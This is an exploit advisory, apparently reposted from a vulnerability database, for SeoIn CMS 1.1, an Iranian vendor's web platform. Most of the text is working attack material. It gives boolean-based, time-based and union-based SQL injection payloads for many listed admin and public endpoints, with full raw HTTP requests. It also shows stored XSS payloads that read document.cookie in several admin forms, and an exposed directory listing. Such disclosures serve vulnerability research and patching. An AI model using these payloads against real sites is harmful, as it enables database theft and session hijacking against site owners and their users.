SeoIn CMS 1.1 - Multiple Vulnerabilities

2019.03.09
ir SajjadBnz (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: SeoIn CMS 1.1 - Multiple Vulnerabilities # Date: 2019-01-14 # Exploit Author: SajjadBnz # My Email: blackwolf@post.com # Vendor Homepage: http://seoin.ir # Version: 1.1 # Tested version: 1.1 - shopping website # Vulnerability Types: Union-Base SQL Injection, boolean-based blind, Presistent XSS , AND/OR time-based blind , Persistent XSS , Directory/Path Traversal [+] About : =========== seoin.ir : We provide web sites and SEO services, or website optimization, in search engines like Google and Yahoo. our products Customer Relationship Management Panel Version 1.1 Online Store Industrial websites Support Center http://seoin.ir/#about/8 : Institute of Information Technology One of the first companies in the field of web marketing services and website designing in the country, with more than 8 years of legal experience and 12 years of experience ready to provide services to your loved ones. [ Vulnerabilities ] [+] 1. AND boolean-based blind ============================== Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 5555=5555 Payload: id=10 AND 5555=5555 Payload: id=83 AND 5555=5555 Payload: id=24 AND 5555=5555 http://www.target.com/home/catpage.php?id=1[SQL] http://www.target.com/admin/public/product_sub_group/edit.php?id=10[SQL] (in admin panel) http://www.target.com/admin/public/comment/select_answer.php?id=83[SQL] (in admin panel) http://www.target.com/admin/public/project/edit.php?id=24[SQL] (in admin panel) [*] header : GET /home/catpage.php?id=1%20AND%205555=5555 GET /admin/public/product_sub_group/edit.php?id=10%20AND%205555=5555 (in admin panel) GET /admin/public/comment/select_answer.php?id=83%20AND%205555=5555 (in admin panel) GET /admin/public/project/edit.php?id=24 AND 5555=5555 (in admin panel) User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: PHPSESSID=eiqr4s0j1cgouqqo2nlt2ik1t6 Upgrade-Insecure-Requests: 1 [+] 2. AND/OR time-based blind ============================== Parameter: id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=1 AND SLEEP(5) http://www.target.com/home/catpage.php?id=1[SQL] [*] Header : GET /home/catpage.php?id=1%20AND%20SLEEP(5) User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: PHPSESSID=eiqr4s0j1cgouqqo2nlt2ik1t6 Upgrade-Insecure-Requests: 1 [+] 3. Union-Based (Basic) SQL Injection ======================================== You should Login as Admin (/admin/login.php) Parameter: id (GET) Type: Union-Based (Basic) SQL Injection Payload: id=-13 UNION SELECT 1,2,version(),user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- - Payload: id=-24 UNION SELECT 1,2,3,4,5,6,7,8,9,user(),11,version(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- - Payload: id=-1 UNION SELECT 1,user(),version(),4,5,6,7,8,9,10,11-- - Payload: id=-1 UNION SELECT 1,user(),3,4,5,6-- - Payload: id=-3 UNION SELECT 1,user(),version(),4,5,6,7,8,9,10-- - Payload: id=-21 UNION SELECT 1,version(),3,4,5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--%20- http://target.com/admin/public/product/edit.php?id=13[SQL] http://target.com/admin/public/project/translate.php?id=24[SQL] http://target.com/admin/public/news/edit.php?id=1[SQL] http://target.com/admin/public/file/edit.php?id=1[SQL] http://target.com/admin/public/education/edit.php?id=3[SQL] http://target.com/admin/public/agency/edit.php?id=1[SQL] http://target.com/admin/public/employment/edit.php?id=21[SQL] [*] Header : GET /admin/public/product/edit.php?id=-13%20UNION%20SELECT%201,2,version(),user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--%20- GET /admin/public/project/translate.php?id=-24 UNION SELECT 1,2,3,4,5,6,7,8,9,user(),11,version(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- - GET /admin/public/news/edit.php?id=-1%20UNION%20SELECT%201,user(),version(),4,5,6,7,8,9,10,11-- - GET /admin/public/file/edit.php?id=-1%20UNION%20SELECT%201,user(),3,4,5,6-- - GET /admin/public/education/edit.php?id=-3%20UNION%20SELECT%201,user(),version(),4,5,6,7,8,9,10-- - GET /admin/public/agency/edit.php?id=-1%20UNION%20SELECT%201,user(),version(),4,5,6,7,8,9,10-- - GET /admin/public/employment/edit.php?id=-21%20UNION%20SELECT%201,version(),3,4,5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--%20- User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: PHPSESSID=la3ijqba92l760moephnle58q3 Upgrade-Insecure-Requests: 1 [+] 4. Persistent XSS (Cross-site Scripting) - in Admin Panel ============================================================= http://target.com/admin/public/news/add.php [*] header: POST /admin/public/news/add.php User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://target.com/admin/public/news/add.php Content-Type: multipart/form-data; boundary=---------------------------17937452617934146491585086724 Content-Length: 1022 Connection: keep-alive Cookie: PHPSESSID=la3ijqba92l760moephnle58q3 Upgrade-Insecure-Requests: 1 post header : news_topic=<script>alert(document.cookie)</script>&news_text=<p>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</p> &news_pic=&news_status=0&news_lang=1&news_reseller=1&news_sort=0 then in this page http://target.com/admin/public/news/select.php Javascript is running you can place javascript Another persistent XSS : POST /admin/public/file/server/add.php User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://target.com/admin/public/file/add.php Content-Type: multipart/form-data; boundary=---------------------------27862807420897948352132776782 Content-Length: 500 Connection: keep-alive Cookie: PHPSESSID=la3ijqba92l760moephnle58q3 Upgrade-Insecure-Requests: 1 post header : file_topic=<script>alert(document.cookie)</script>&file_file=&file_status=0 Javascript is runing on this page : http://target.com/admin/public/file/select.php Another persistent XSS : POST /admin/public/link/server/add.php POST data : link_name=<script>alert(document.cookie)</script>&link_url=<script>alert(document.cookie)</script>&link_status=0&link_lang=1&link_reseller=1&link_sort=0 Javascript is Runing on this page : http://target.com/admin/public/link/select.php *NOTE : All pages have this vulnerability [+] 5. Directory/Path Traversal : ================================ http://target.com/admin/public/ you can found error_log and other php files such as: edit,add & .... in all directories #EOF


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top